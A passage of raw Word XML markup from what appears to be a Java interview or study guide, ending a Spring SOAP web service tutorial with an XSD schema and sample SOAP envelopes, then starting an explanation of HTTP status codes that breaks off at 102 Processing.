      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>messageDispatcherServlet()</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Registers a MessageDispatcherServlet to handle incoming SOAP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49972EBB" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1813"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>defaultWsdl11Definition()</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines the WSDL (Web Services Description Language) for the service and its port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E89CE4" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1813"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bookSchema()</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines the XML Schema (XSD) for the book data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D7B251" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6. Create the XSD Schema (book.xsd):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE09EF4"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The XML schema defines the structure of the request and response messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663E9BBA"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Example of XSD (book.xsd)</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE92B68"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lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E32D96C"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lt;xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCBD741"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targetNamespace="http://example.com/webservice"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0DBC57"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xmlns:tns="http://example.com/webservice"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFF4CD0"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elementFormDefault="qualified"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C32C778" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="131AFC78"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xs:element name="getBookDetailsRequest"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D545213"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xs:complexType&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DD6B81"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xs:sequence&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27723471"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xs:element name="bookId" type="xs:string"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6352A133"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xs:sequence&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FF0CAC"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xs:complexType&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9618F3"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xs:element&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B47DC80" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EE2D325"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xs:element name="getBookDetailsResponse"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECB1892"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xs:complexType&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107A629F"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xs:sequence&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42262F79"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xs:element name="bookTitle" type="xs:string"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF81A42"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xs:element name="author" type="xs:string"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421445FF"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xs:element name="price" type="xs:decimal"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECE1052"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xs:sequence&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6254D49B"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xs:complexType&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6D2EB3"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xs:element&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A5748C" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="247511E0"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lt;/xs:schema&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3B913F" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7. Run and Test the SOAP Web Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3FF3AF" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1814"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Run the application as a Spring Boot application or deploy it to a servlet container (such as Tomcat).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2274333A" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1814"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The SOAP service will be accessible at http://localhost:8080/ws (assuming default settings).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDE09D1" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1814"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You can access the WSDL by navigating to http://localhost:8080/ws/BookService.wsdl.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072B774A" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1814"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Test the service using SOAP tools like SoapUI or Postman, providing the correct SOAP request and expecting the appropriate response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298BF5A0" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8. SOAP Request Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795AC740"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Here’s an example of a SOAP request that the client would send:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9AD112"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lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10536BE5"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lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5EE730"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xmlns:web="http://example.com/webservice"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D802B7"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soapenv:Header/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ECFE13"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soapenv:Body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DBDF57"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web:getBookDetailsRequest&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F13EE89"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web:bookId&gt;12345&lt;/web:bookId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB2E71E"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web:getBookDetailsRequest&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5952B9"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soapenv:Body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C76178"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lt;/soapenv:Envelope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F2FF8D" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>9. SOAP Response Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75429E95"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Here’s an example of a SOAP response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CABC95"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lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B15CBF"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lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3FE334"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xmlns:web="http://example.com/webservice"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFC173D"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soapenv:Header/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55142E5D"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soapenv:Body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02439043"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web:getBookDetailsResponse&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75021215"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web:bookTitle&gt;Introduction to SOAP&lt;/web:bookTitle&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7CB53A"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web:author&gt;John Doe&lt;/web:author&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A415DBE"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web:price&gt;29.99&lt;/web:price&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B61C9D"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 xml:space="preserve">      &lt;/web:getBookDetailsResponse&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D747DA9"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">   &lt;/soapenv:Body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2905B94D"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lt;/soapenv:Envelope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA29105" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By following these steps, you can create and expose a SOAP web service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC9BA75" w14:textId="77777777" w:rsidR="00E41215" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004F5B4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D880C6C">
          <v:rect id="_x0000_i1985" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13403177" w14:textId="10099C37" w:rsidR="00E41215" w:rsidRPr="00CE4B95" w:rsidRDefault="00E41215" w:rsidP="00E41215">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="407" w:name="_Toc196307887"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is HTTP status code and explain all status codes?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="407"/>
    </w:p>
    <w:p w14:paraId="5D0BEB3A" w14:textId="4D8C293E" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP Status Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4BE8B7" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP status codes are three-digit numbers returned by a web server to indicate the result of an HTTP request. These codes are grouped into five categories based on the type of response they represent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542B7A63" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1815"/>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1xx (Informational)</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request was received, and the server is processing it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230313DD" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1815"/>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2xx (Successful)</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request was successfully received, understood, and processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481DCE57" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1815"/>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3xx (Redirection)</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Further action is required to complete the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A81BD44" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1815"/>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4xx (Client Error)</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request contains bad syntax or cannot be fulfilled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E46B57E" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1815"/>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5xx (Server Error)</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server failed to fulfill a valid request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AD69CF" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>List of Common HTTP Status Codes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC0E52B" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1xx - Informational</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F247A95" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1816"/>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100 Continue</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server has received the request headers, and the client should proceed to send the request body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357FAFC6" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1816"/>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101 Switching Protocols</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server is switching protocols as per the client's request (e.g., switching to WebSocket).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E870C54" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1816"/>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102 Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server has received and is processing the request, but no response is yet available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF0E4B5" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
